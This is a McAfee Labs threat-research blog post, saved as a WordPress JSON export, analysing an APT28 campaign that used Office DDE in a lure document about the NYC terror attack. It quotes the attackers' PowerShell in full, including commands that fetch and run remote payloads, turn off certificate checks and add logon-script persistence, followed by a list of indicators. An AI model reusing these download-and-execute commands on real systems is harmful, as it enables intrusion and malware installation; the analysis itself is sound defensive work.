{"id":82022,"date":"2017-11-07T10:00:01","date_gmt":"2017-11-07T18:00:01","guid":{"rendered":"https:\/\/securingtomorrow.mcafee.com\/?p=82022"},"modified":"2025-05-27T22:30:47","modified_gmt":"2025-05-28T05:30:47","slug":"apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/","title":{"rendered":"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack"},"content":{"rendered":"<p><em>This blog post was co-written by Michael Rea.<\/em><\/p>\n<p>During our monitoring of activities around the APT28 threat group, McAfee Advanced Threat Research analysts identified a malicious Word document that appears to leverage the Microsoft Office Dynamic Data Exchange (DDE) technique that has been previously reported by Advanced Threat Research. This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim\u2019s system regardless whether macros are enabled. (McAfee product detection is covered in the Indicators of Compromise section at the end of the document.)<\/p>\n<p>APT28, also known as Fancy Bear, has recently focused on using different themes. In this case it capitalized on the recent terrorist attack in New York City. The document itself is blank. Once opened, the document contacts a control server to drop the first stage of the malware, Seduploader, onto a victim\u2019s system.<\/p>\n<p>The domain involved in the distribution of Seduploader was created on October 19, 11 days prior to the creation of Seduploader.<\/p>\n<p>The document we examined for this post:<\/p>\n<ul>\n<li>Filename: IsisAttackInNewYork.docx<\/li>\n<li>Sha1: 1c6c700ceebfbe799e115582665105caa03c5c9e<\/li>\n<li>Creation date: 2017-10-27T22:23:00Z<\/li>\n<\/ul>\n<p>The document uses the recently detailed DDE technique found in Office products to invoke the command prompt to invoke PowerShell, which runs two commands. The first:<\/p>\n<p style=\"padding-left: 30px;\">C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(&#8216;hxxp:\/\/netmediaresources[.]com\/config.txt&#8217;);powershell -enc $e #.EXE<\/p>\n<p>The second PowerShell command is Base64 encoded and is found in the version of config.txt received from the remote server. It decodes as follows:<\/p>\n<p style=\"padding-left: 30px;\">$W=New-Object System.Net.WebClient;<br \/>\n$p=($Env:ALLUSERSPROFILE+&#8221;\\vms.dll&#8221;);<br \/>\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};<br \/>\n$W.DownloadFile(&#8220;hxxp:\/\/netmediaresources[.]com\/media\/resource\/vms.dll &#8220;,$p);<br \/>\nif (Test-Path $p){<br \/>\n$rd_p=$Env:SYSTEMROOT+&#8221;\\System32\\rundll32.exe&#8221;;<br \/>\n$p_a=$p+&#8221;,#1&#8243;;<br \/>\n$pr=Start-Process $rd_p -ArgumentList $p_a;<br \/>\n$p_bat=($Env:ALLUSERSPROFILE+&#8221;\\vms.bat&#8221;);<br \/>\n$text=&#8217;set inst_pck = &#8220;%ALLUSERSPROFILE%\\vms.dll&#8221;&#8216;+&#8221;`r`n&#8221;+&#8217;if NOT exist %inst_pck % (exit)&#8217;+&#8221;`r`n&#8221;+&#8217;start rundll32.exe %inst_pck %,#1&#8217;<br \/>\n[io.File]::WriteAllText($p_bat,$text)<br \/>\nNew-Item -Path &#8216;HKCU:\\Environment&#8217; -Force | Out-Null;<br \/>\nNew-ItemProperty -Path &#8216;HKCU:\\Environment&#8217; -Name &#8216;UserInitMprLogonScript&#8217; -Value &#8220;$p_bat&#8221; -PropertyType String -Force | Out-Null;<br \/>\n}<\/p>\n<p>The PowerShell scripts contact the following URL to download Seduploader:<\/p>\n<ul>\n<li>hxxp:\/\/netmediaresources[.]com\/media\/resource\/vms.dll<\/li>\n<\/ul>\n<p>The Seduploader sample has the following artifacts:<\/p>\n<ul>\n<li>Filename: vms.dll<\/li>\n<li>Sha1: 4bc722a9b0492a50bd86a1341f02c74c0d773db7<\/li>\n<li>Compile date: 2017-10-31 20:11:10<\/li>\n<li>Control server: webviewres[.]net<\/li>\n<\/ul>\n<p>The document downloads a version of the Seduploader first-stage reconnaissance implant, which profiles prospective victims, pulling basic host information from the infected system to the attackers. If the system is of interest, then the installation of X-Agent or Sedreco usually follows.<\/p>\n<p>We have observed APT28 using Seduploader as a first-stage payload for several years from various public reporting. Based on structural code analysis of recent payloads observed in the campaign, we see they are identical to previous Seduploader samples employed by APT28.<\/p>\n<p>We identified the control server domain associated with this activity as webviewres[.]net, which is consistent with past APT28 domain registration techniques that spoof legitimate-sounding infrastructure. This domain was registered on October 25, a few days before the payload and malicious documents were created. The domain was first active on October 29, just days before this version of Seduploader was compiled. The IP currently resolves to 185.216.35.26 and is hosted on the name servers ns1.njal.la and ns2.njal.la.<\/p>\n<p>Further McAfee research identified the following related sample:<\/p>\n<ul>\n<li>Filename: secnt.dll<\/li>\n<li>Sha1: ab354807e687993fbeb1b325eb6e4ab38d428a1e<\/li>\n<li>Compile date: 2017-10-30 23:53:02<\/li>\n<li>Control server: satellitedeluxpanorama[.]com. (This domain uses the same name servers as above.)<\/li>\n<\/ul>\n<p>The preceding sample most likely belongs to the same campaign. Based on our analysis it uses the same techniques and payload. We can clearly establish that the campaign involving documents using DDE techniques began on October 25.<\/p>\n<p>The domain satellitedeluxpanorama[.]com, used by the implant secnt.dll, resolved to 89.34.111.160 as of November 5. The malicious document 68c2809560c7623d2307d8797691abf3eafe319a is responsible for dropping the Seduploader payload (secnt.dll). Its original file name was SaberGuardian2017.docx. This document was created on October 27. The document is distributed from hxxp:\/\/sendmevideo[.]org\/SaberGuardian2017.docx. The document calls sendmevideo[.]org\/dh2025e\/eh.dll to download Seduploader (ab354807e687993fbeb1b325eb6e4ab38d428a1e).<\/p>\n<p>The PowerShell command embedded in this document:<\/p>\n<p style=\"padding-left: 30px;\">$W=New-Object System.Net.WebClient;<\/p>\n<p style=\"padding-left: 30px;\">$p=($Env:ALLUSERSPROFILE+&#8221;\\mvdrt.dll&#8221;);<\/p>\n<p style=\"padding-left: 30px;\">[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};<\/p>\n<p style=\"padding-left: 30px;\">$W.DownloadFile(&#8220;http:\/\/sendmevideo.org\/dh2025e\/eh.dll&#8221;,$p);<\/p>\n<p style=\"padding-left: 30px;\">if (Test-Path $p){<\/p>\n<p style=\"padding-left: 30px;\">$rd_p=$Env:SYSTEMROOT+&#8221;\\System32\\rundll32.exe&#8221;;<\/p>\n<p style=\"padding-left: 30px;\">$p_a=$p+&#8221;,#1&#8243;;<\/p>\n<p style=\"padding-left: 30px;\">$pr=Start-Process $rd_p -ArgumentList $p_a;<\/p>\n<p style=\"padding-left: 30px;\">$p_bat=($Env:ALLUSERSPROFILE+&#8221;\\mvdrt.bat&#8221;);<\/p>\n<p style=\"padding-left: 30px;\">$text=&#8217;set inst_pck = &#8220;%ALLUSERSPROFILE%\\mvdrt.dll&#8221;&#8216;+&#8221;`r`n&#8221;+&#8217;if NOT exist %inst_pck % (exit)&#8217;+&#8221;`r`n&#8221;+&#8217;start rundll32.exe %inst_pck %,#1&#8217;<\/p>\n<p style=\"padding-left: 30px;\">[io.File]::WriteAllText($p_bat,$text)<\/p>\n<p style=\"padding-left: 30px;\">New-Item -Path &#8216;HKCU:\\Environment&#8217; -Force | Out-Null;<\/p>\n<p style=\"padding-left: 30px;\">New-ItemProperty -Path &#8216;HKCU:\\Environment&#8217; -Name &#8216;UserInitMprLogonScript&#8217; -Value &#8220;$p_bat&#8221; -PropertyType String -Force | Out-Null;<\/p>\n<p style=\"padding-left: 30px;\">}<\/p>\n<p>The file vms.dll, 4bc722a9b0492a50bd86a1341f02c74c0d773db7, is 99% similar-to secnt.dll ab354807e687993fbeb1b325eb6e4ab38d428a1e, indicating the code is almost identical and highly likely to be part of the same campaign. These two DLL implants are likely part of the same campaign. Furthermore, the sample 4bc722a9b0492a50bd86a1341f02c74c0d773db7, based on our code analysis, is 99% similar to the DLL implant 8a68f26d01372114f660e32ac4c9117e5d0577f1, which was used in a campaign spoofing the upcoming cyber conference <a href=\"http:\/\/aci.cvent.com\/events\/2017-international-conference-on-cyber-conflict-cycon-u-s-\/event-summary-004d598d31684f21ac82050a9000369f.aspx\">Cy Con U.S.<\/a><\/p>\n<p>The attack techniques in the two campaigns differ: The campaign spoofing the Cy Con U.S conference used document files to execute a malicious VBA script; this campaign using the terrorist theme uses DDE within a document file to execute PowerShell and fetches a remote payload from a distribution site. The payloads, however, are identical for both campaigns.<\/p>\n<h2><strong>Conclusion<\/strong><\/h2>\n<p>APT28 is a resourceful threat actor that not only capitalizes on recent events to trick potential victims into infections, but can also rapidly incorporate new exploitation techniques to increase its success. Given the publicity the Cy Con U.S campaign received in the press, it is possible APT28 actors moved away from using the VBA script employed in past actions and chose to incorporate the DDE technique to bypass network defenses. Finally, the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28\u2019s ability and interest in exploiting geopolitical events for their operations.<\/p>\n<h2><strong>Indicators of Compromise<\/strong><\/h2>\n<p><em>SHA1 Hashes<\/em><\/p>\n<ul>\n<li>ab354807e687993fbeb1b325eb6e4ab38d428a1e (vms.dll, Seduploader implant)<\/li>\n<li>4bc722a9b0492a50bd86a1341f02c74c0d773db7 (secnt.dll, Seduploader implant)<\/li>\n<li>1c6c700ceebfbe799e115582665105caa03c5c9e (IsisAttackInNewYork.docx)<\/li>\n<li>68c2809560c7623d2307d8797691abf3eafe319a (SaberGuardian.docx)<\/li>\n<\/ul>\n<p><em>Domains<\/em><\/p>\n<ul>\n<li>webviewres[.]net<\/li>\n<li>netmediaresources[.]com<\/li>\n<\/ul>\n<p><em>IPs<\/em><\/p>\n<ul>\n<li>\u00a0185.216.35.26<\/li>\n<li>89.34.111.160<\/li>\n<\/ul>\n<p><em>\u00a0<\/em><em>McAfee coverage<\/em><\/p>\n<ul>\n<li>\u00a0McAfee products detect this threat as\u00a0RDN\/Generic Downloader.x.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>This blog post was co-written by Michael Rea. During our monitoring of activities around the APT28 threat group, McAfee Advanced&#8230;<\/p>\n","protected":false},"author":911,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1814,4452,338],"coauthors":[2544],"class_list":["post-82022","post","type-post","status-publish","format-standard","hentry","category-mcafee-labs","tag-computer-security","tag-cybersecurity","tag-endpoint-protection"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack<\/title>\n<meta name=\"description\" content=\"While monitoring activities around APT28, we identified a malicious Word document that leverages the Microsoft Office DDE technique.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack\" \/>\n<meta property=\"og:description\" content=\"While monitoring activities around APT28, we identified a malicious Word document that leverages the Microsoft Office DDE technique.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2017-11-07T18:00:01+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-05-28T05:30:47+00:00\" \/>\n<meta name=\"author\" content=\"Ryan Sherstobitoff\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@r_sherstobitoff\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Ryan Sherstobitoff\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\"},\"author\":{\"name\":\"Ryan Sherstobitoff\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035\"},\"headline\":\"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack\",\"datePublished\":\"2017-11-07T18:00:01+00:00\",\"dateModified\":\"2025-05-28T05:30:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\"},\"wordCount\":1197,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"keywords\":[\"computer security\",\"cybersecurity\",\"endpoint protection\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\",\"name\":\"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"datePublished\":\"2017-11-07T18:00:01+00:00\",\"dateModified\":\"2025-05-28T05:30:47+00:00\",\"description\":\"While monitoring activities around APT28, we identified a malicious Word document that leverages the Microsoft Office DDE technique.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035\",\"name\":\"Ryan Sherstobitoff\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/b9bc99b6021883cbf5794b450795dc55\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg\",\"caption\":\"Ryan Sherstobitoff\"},\"description\":\"Ryan Sherstobitoff is a Senior Analyst for Major Campaigns \u2013 Advanced Threat Research in McAfee. Ryan specializes in threat intelligence in the Asia Pacific Region where he conducts cutting edge research into new adversarial techniques and adapts those to better monitor the threat landscape. He formerly was the Chief Corporate Evangelist at Panda Security, where he managed the US strategic response for new and emerging threats. Ryan is widely recognized as a security &amp; cloud computing expert throughout the country.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/in\/ryan-sherstobitoff-a1334a5\/\",\"https:\/\/x.com\/r_sherstobitoff\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/ryan-sherstobitoff\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack","description":"While monitoring activities around APT28, we identified a malicious Word document that leverages the Microsoft Office DDE technique.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack","og_description":"While monitoring activities around APT28, we identified a malicious Word document that leverages the Microsoft Office DDE technique.","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2017-11-07T18:00:01+00:00","article_modified_time":"2025-05-28T05:30:47+00:00","author":"Ryan Sherstobitoff","twitter_card":"summary_large_image","twitter_creator":"@r_sherstobitoff","twitter_site":"@McAfee","twitter_misc":{"Written by":"Ryan Sherstobitoff","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/"},"author":{"name":"Ryan Sherstobitoff","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035"},"headline":"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack","datePublished":"2017-11-07T18:00:01+00:00","dateModified":"2025-05-28T05:30:47+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/"},"wordCount":1197,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"keywords":["computer security","cybersecurity","endpoint protection"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/","name":"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"datePublished":"2017-11-07T18:00:01+00:00","dateModified":"2025-05-28T05:30:47+00:00","description":"While monitoring activities around APT28, we identified a malicious Word document that leverages the Microsoft Office DDE technique.","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035","name":"Ryan Sherstobitoff","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/b9bc99b6021883cbf5794b450795dc55","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg","caption":"Ryan Sherstobitoff"},"description":"Ryan Sherstobitoff is a Senior Analyst for Major Campaigns \u2013 Advanced Threat Research in McAfee. Ryan specializes in threat intelligence in the Asia Pacific Region where he conducts cutting edge research into new adversarial techniques and adapts those to better monitor the threat landscape. He formerly was the Chief Corporate Evangelist at Panda Security, where he managed the US strategic response for new and emerging threats. Ryan is widely recognized as a security &amp; cloud computing expert throughout the country.","sameAs":["https:\/\/www.linkedin.com\/in\/ryan-sherstobitoff-a1334a5\/","https:\/\/x.com\/r_sherstobitoff"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/ryan-sherstobitoff\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/82022","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/911"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=82022"}],"version-history":[{"count":3,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/82022\/revisions"}],"predecessor-version":[{"id":214556,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/82022\/revisions\/214556"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=82022"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=82022"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=82022"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=82022"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}